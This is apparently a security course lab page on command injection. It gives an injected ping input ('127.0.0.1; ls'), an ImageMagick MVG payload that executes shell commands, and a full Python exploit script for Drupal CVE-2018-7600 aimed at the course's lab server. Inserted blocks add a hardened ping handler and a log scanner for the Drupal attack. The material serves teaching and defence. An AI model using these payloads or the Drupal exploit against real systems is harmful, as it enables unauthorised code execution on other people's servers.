ED 102: Command Injection (20 pts + 40 pts extra)


Ping Form (20 pts)

The form below lets you send pings to a remote host. Unfortunately, it has a vulnerability.

To use the form normally, enter a target, such as

127.0.0.1
To see the vulnerability, enter
127.0.0.1; ls
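The page does not show the form's server-side handler, so the following is an added example (not code from the original page or from samsclass.info) that reconstructs the injectable pattern, "ping" plus the raw field value handed to a shell, and places a hardened handler beside it. The hardened version only accepts a literal IP address and runs ping with an argument list, never through a shell. The function names and the 15-second timeout are assumptions of this example.

```python
import ipaddress
import subprocess

# Added example, not code from the original page. The ping form's real
# handler is not shown there; vulnerable_command_string() reconstructs
# the pattern that makes "127.0.0.1; ls" run a second command.


def vulnerable_command_string(target: str) -> str:
    """The injectable pattern: the user's text is pasted into shell syntax.
    Returned only for comparison; never run this with shell=True."""
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Return the canonical IP address, or raise ValueError for anything else.
    ipaddress rejects hostnames, shell metacharacters and '127.0.0.1; ls'."""
    return str(ipaddress.ip_address(target.strip()))


def is_safe_target(target: str) -> bool:
    """Boolean wrapper around validate_target() for form validation."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_ping_command(target: str, count: int = 1) -> list:
    """Build argv for ping: the target is one argument, not shell text."""
    return ["ping", "-c", str(int(count)), validate_target(target)]


def run_ping(target: str) -> str:
    """Run ping with an argv list (no shell), so ';', '|' and '$()' in the
    input can never start a second command."""
    result = subprocess.run(build_ping_command(target),
                            capture_output=True, text=True, timeout=15)
    return result.stdout + result.stderr


if __name__ == "__main__":
    for candidate in ["127.0.0.1", "::1", "127.0.0.1; ls", "$(id)"]:
        verdict = "accepted" if is_safe_target(candidate) else "rejected"
        print(f"{candidate!r}: {verdict}; shell string would have been "
              f"{vulnerable_command_string(candidate)!r}")
```

Two things are doing the work here: the allow-list check (anything that is not an IP address is refused before any command is built) and the argv list, which makes the shell irrelevant even if the check were later loosened to accept hostnames.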

Challenges: Find the Flags (20 pts)

There are four flags available on this server:

ImageMagick Vulnerability (20 pts)

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image

Vulnerability

Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenges: Find the Flags (20 pts)

There are two flags available in the "chal2" folder:

Drupal Command Injection (20 pts extra)

Background

In April 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:

https://thehackernews.com/2018/04/drupal-rce-exploit-code.html

In this project, you'll perform that attack.

Viewing the Vulnerable Website

In a browser, go to:

https://drupal.samsclass.info/

The site is protected by HTTP basic authentication. Log in with a username of student1 and a password of student1.

It's just a default installation of Drupal, as shown below.

Preparing the Attack

Using a text editor, such as nano or Notepad, create a file named dru.py containing this code. Change the filename YOURNAME to something unique in all three places it appears.
import sys
import requests
from requests.auth import HTTPBasicAuth

# Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh

target = "https://drupal.samsclass.info/"

url = target + 'user/register?element_parents=account/mail/' \
      + '%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
      
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 
           'mail[#post_render][]': 'exec', 'mail[#type]': 'markup',
           'mail[#markup]': 'echo ";-)" | tee YOURNAME.txt'}

r = requests.post(url, data=payload, auth=HTTPBasicAuth('student1', 'student1'))

check = requests.get(target + 'YOURNAME.txt', auth=HTTPBasicAuth('student1', 'student1'))
if check.status_code != 200:
  sys.exit("Not exploitable")
  
print ('\nCheck: '+target+'YOURNAME.txt')

Running the Attack

In a Terminal or Command Prompt window, execute this command:
python dru.py
The attack succeeds, creating a file on the target server, as shown below.
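From the server side, the request dru.py sends leaves a recognisable line in the Apache access log. As an added example (not code from the original page, and not part of Drupal), here is a small scanner that parses "combined"-format log lines and flags requests whose element_parents query parameter points at a "#" render-array property with ajax_form=1. The log lines are constructed; the IPs are documentation addresses and the user-agent strings are assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added example, not code from the original page: scan Apache "combined"
# access-log lines for the request shape used by dru.py. The sample lines
# are constructed; the IPs are documentation addresses.

SAMPLE_LOG = [
    '203.0.113.5 - student1 [23/Apr/2019:10:02:11 -0700] "POST /user/register'
    '?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    ' HTTP/1.1" 200 512 "-" "python-requests/2.21.0"',
    '203.0.113.5 - student1 [23/Apr/2019:10:02:12 -0700] "GET /YOURNAME.txt HTTP/1.1"'
    ' 200 4 "-" "python-requests/2.21.0"',
    '198.51.100.7 - student1 [23/Apr/2019:10:05:00 -0700] "GET /user/register HTTP/1.1"'
    ' 200 9100 "-" "Mozilla/5.0"',
    '198.51.100.7 - student1 [23/Apr/2019:10:05:03 -0700] "GET /node/1 HTTP/1.1"'
    ' 200 7300 "-" "Mozilla/5.0"',
]

# Apache "combined" format: ip ident user [time] "method target proto" status size ...
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Return the named fields of one log line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_form_api_injection(request_target: str) -> bool:
    """True when element_parents names a '#' property (a render-array
    internal such as #value) and ajax_form=1 is set. Apache logs the raw
    request target, so %23 is still encoded here and parse_qs decodes it."""
    query = parse_qs(urlsplit(request_target).query)
    if query.get("ajax_form") != ["1"]:
        return False
    return any("#" in value for value in query.get("element_parents", []))


def scan_log(lines):
    """Return one finding per log line that matches the injection pattern."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_form_api_injection(rec["path"]):
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": int(rec["status"]),
                "path": rec["path"],
                "reason": "Drupal Form API element_parents '#' property injection",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} {f['reason']}: {f['path']}")
```

The access log only records the request target, not the POST body where the mail[#post_render][] and mail[#markup] fields travel, so this rule keys on the URL alone; legitimate Drupal AJAX requests do use ajax_form=1 and element_parents, but a "#"-prefixed element in element_parents is exactly what the vendor fix filters out, so a hit is worth treating as an attack attempt and correlating with any follow-up request for a newly created file from the same address.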

Challenges: Find the Flags (20 pts)

There are two flags on this server:

Adding Basic Authentication to Drupal

For my own future reference, and for those who wish to develop similar projects, here's how I added the authentication. Students can ignore the contents of this box.
sudo cp /etc/apache2/sites-available/drupal.conf /etc/apache2/sites-available/drupal.conf.orig
sudo nano /etc/apache2/sites-available/drupal.conf
Replace the contents with this:
<VirtualHost *:80>
     ServerAdmin admin@samsclass.info
     DocumentRoot /var/www/html/drupal
     ServerName drupal.samsclass.info
     ServerAlias www.drupal.samsclass.info

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined

      <Directory /var/www/html/drupal/>
		AuthType Basic
		AuthName "Private"
		AuthUserFile /etc/apache2/.htaccess
		Require valid-user
		AllowOverride None
		Order allow,deny
		allow from all
		Options FollowSymlinks
      </Directory>

      <Directory /var/www/html/drupal>
            RewriteEngine on
            RewriteBase /
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]
      </Directory>
</VirtualHost>
Save the file.
sudo htpasswd -c /etc/apache2/.htaccess student1
Enter the password student1 twice.
sudo service apache2 restart


Posted 4-21-19
ImageMagick & Drupal added 4-23-19
Extra credit portion labelled 8-17-19
HTTP Basic Authentication added 9-12-19